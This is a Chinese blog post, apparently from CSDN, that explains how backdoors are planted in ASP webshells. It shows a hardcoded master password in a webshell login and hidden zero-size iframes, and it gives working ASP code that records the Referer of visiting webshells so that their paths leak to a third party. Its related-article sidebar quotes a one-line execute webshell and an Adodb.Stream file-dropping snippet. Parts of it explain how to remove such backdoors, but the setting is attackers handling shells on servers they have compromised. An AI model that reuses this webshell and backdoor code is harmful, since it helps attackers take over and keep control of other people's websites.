揭密如何写ASP木马后门

最新推荐文章于 2017-11-23 15:06:00 发布
最新推荐文章于 2017-11-23 15:06:00 发布
阅读量2.4k 收藏 1
点赞数
分类专栏: 网络技术 文章标签: asp

正常的:

EnD fUNCtION  IF SEssIoN("web2a2dmin")<>UsERpaSs thEn  IF requeSt.FoRM("pass")<>"" TheN  iF REquesT.foRM("pass")=uSERPASS Then  SEsSIoN("web2a2dmin")=uSERPAss  rESPOnsE.rEdirEct Url  ELse  rrs"对不起,密码验证失败!"

加有万能密码的:

EnD fUNCtION  IF SEssIoN("web2a2dmin")<>UsERpaSs thEn  IF requeSt.FoRM("pass")<>"" TheN  iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" Then  SEsSIoN("web2a2dmin")=uSERPAss  rESPOnsE.rEdirEct Url  ELse  rrs"对不起,密码验证失败!"

1111111就是传说中的万能密码了。

找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!

下面来找马大多数都喜欢用框架挂马:<iframe src=后门地址 width=0 height=0></iframe>

找到后删了,到此asp后门就算剔除了!

下面教大家后门的原理:

这是一收信的asp代码将其保存为1.asp

<%url=Request.ServerVariables("HTTP_Referer")  set fs=server.CreateObject("Scripting.FileSystemObject")  set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)  file.writeline url  file.close  set file=nothing set fs=nothing %>

代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址
简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里

上传到空间比如 http://127.0.0.1/1.asp

然后里用

<iframe src=http://127.0.0.1/1.asp width=0 height=0></iframe>

插到asp木马中

那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

番薯道长
关注
专栏目录
ASP后门程序
03-07
asp的网站后门程序,可以在线修改网站里的所有文件,可上传文件等
我的ASP后门
04-09
我的ASPX后门!大家看看!
最小的asp后门
蓝法典的专栏
02-15 1216
首先在asp文件中如代码然后在本地个表单 set lP=server.createObject("Adodb.Stream") lP.Open lP.Type=2 lP.CharSet="gb2312" lP.writetext request("hackbin") lP.SaveToFile server.mappath("men.asp"),2 lP.Close set lP=no
一款ASP后门
可爱是名词吗?
01-18 2386
程序源代码, Server.ScriptTimeout=999999999Response.Buffer =trueOn Error Resume NextUserPass="8745968" 修改密码mName="|. _林潴* 专用VIP+6版本" 后门名字SiteURL="" 网站Copyright="注:请勿用于非法用途,否则后果作者概不负责" 版权AD="广告信息 业务
asp文件加后门
04-29 1883
代码: a=Request.TotalBytes:if a Then b="adodb.stream":Set c=Createobject(b):c.Type=1:c.Open:c.Write Request.BinaryRead(a):c.Position=0:d=c.Read:e=chrB(13)&chrB(10):f=Instrb(d,e):g=Instrb(f+1,d,e):set h
隐藏ASP木马后门的两种方法
01-20
1、建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非...
在线扫描探测检查asp站点木马后门的程序
01-20
代码如下:<%@LANGUAGE=”VBSCRIPT” CODEPAGE=”936″...将不被扫描 timeout=600 ‘如果扫描超过600秒,脚本将终止 ‘jspadmin@asp.web.csdn=阿笨狗=飞云 修改于2006.07.07 ‘获取最新修改版本,请关注http:/
asp后门asp木马大清理.txt
03-09
### ASP后门ASP木马大清理技巧详解 随着网络技术的发展与普及,网站安全问题日益突出,其中ASP(Active Server Pages)木马是威胁网站安全的重要因素之一。本文将根据给定的信息,详细介绍如何有效地发现及清理...
com1/lpt1/prn/nul 木马后门处理方法集合
09-30
处理这类木马后门需要仔细分析网站中的文件,查找异常的ASP文件,并通过删除或者替换的方式来清除威胁。 清理木马后门的关键步骤包括:1) 安全备份整个网站目录,尤其是数据文件;2) 查找并分析具有异常特征的ASP...
新型ASP后门源代码分析
10-31
ASP后门源代码分析 本篇文章将对新型ASP后门源代码进行深入分析,以帮助读者更好地理解 ASP 后门的工作原理和检测方法。 一、ASP 后门简介 ASP 后门是一种恶意代码,旨在通过 Web 应用程序来控制感染的计算机。...
asp后门文件
03-05
博文链接:https://kenter1643.iteye.com/blog/189053
暗组经典asp webshell(去后门)
01-30
暗组经典asp webshell(去后门),已经成功去后门,暗组的webshell功能强大。 本人亲测,不信的可用数据抓包查看。
查杀ASP网页木马,找到后门页面
05-26
查杀ASP网页木马,找到后门页面,这个我是一年前找到的东西,不好意思刚发上来,最近很多ASP网站被挂马,用这个查杀,马上能找到被上传后门的那个页面。 这个代码也是我在网上找的,没有做任何改动,默认登录admin 我不承担任何后果,谢谢
几种另类的ASP后门
01-03
<%  ‘code by netpatch dim dbfile,sql  db=”netpatch.asp” dbfile=server.MapPath(db)  set ydb=server.CreateObject(“ADOX.Catalog”)  ydb.Create “Provider=Microsoft.Jet.OLEDB.4.0;Data Source=” & dbfile  set ydb=nothing  if err.number=0 then  Response.Write dbfile & ” 创建成功<br> ”  else  Response.Write “创建失败
最小asp后门程序
01-02
首先在asp文件中如<%execute request(“value”)%>代码如果想要隐藏,就要加入一些if判断语句,即可然后在本地个表单 代码如下:<form action=http://***.com/jb51.asp method=post> <textarea name=value cols=120 rows=10 width=45> set lP=server.createObject(“Adodb.Stream”) lP.Open lP.Type=2 lP.CharSet=”gb2312″ lP.writetext request(“hackbin”) lP.SaveToF
asp木马后门asp木马后门
huike008的博客
05-21 123
好不容易拿到个shell又被别人偷走了怎么甘心啊! 难免有些居心不良的人会在里面加后门。 所以在下完asp木马后要先检查有没后门, 通常加了后门的为了隐秘性,都会加密!所以首先我们要先解密 asp木马解密工具 解密后先检查有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录 正常的: EnD fUNCtION IF SEssIoN("web2a2dmin")&lt...
ASP后门之终极伪装
...::: X.U.S.T :::...
11-14 2035
申明:本文已刊登于《黑客X档案》2004年9期,转载请注明。---------------------------  记得当年asp木马出来的时候号称"永不被杀的木马",呵呵,时至今日,随便什么杀毒软件都能将其杀得片甲不留^_^呵呵,受到木马换壳躲避杀毒软件思路影响,我们也可以给asp木马"加壳"(呵呵,当然不是用UPX等)。还等什么?请往下看。  其实这个思路很简单,就是把asp代码编码,执行时
计划自己一个木马后门
liswa 电脑备忘录
12-27 1827
用别人的木马后门总是会遭遇经常被查杀的后果,及时是做了免杀处理,但说不定明天又会被杀了(呵呵,再说我也不会做免杀),反正网上关于木马后门的技术已经流传得很多了,也有很多优秀的思想,所以很久以来都想着自己一个后门程序,不在网上发布,按理说就不会被查杀了(我又不会到处黑机器,没有理由让杀毒软件盯上。)。还是打算用Delphi,毕竟太熟悉了,老婆劝我也要熟悉一下别的工具,的确很有道理,现在好像外面的公
彻底找出WEB空间中的ASP后门(上)
weixin_33973600的博客
11-23 257
前一段时间以来,动网爆出了好几个重量级别的漏洞,个个都能导致入侵者在web空间中放置asp木马asp木马可是网站管理员非常头疼的东西,它隐蔽性高、功能强,再加上不断翻新的种类来逃避杀毒软件,一旦web空间被放置了不同种类的asp木马,那么清除起来非常麻烦,很多朋友在细心整理web空间之后,仍然将asp木马驱之不尽,只有更换了全部的web文件,非常无奈!...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值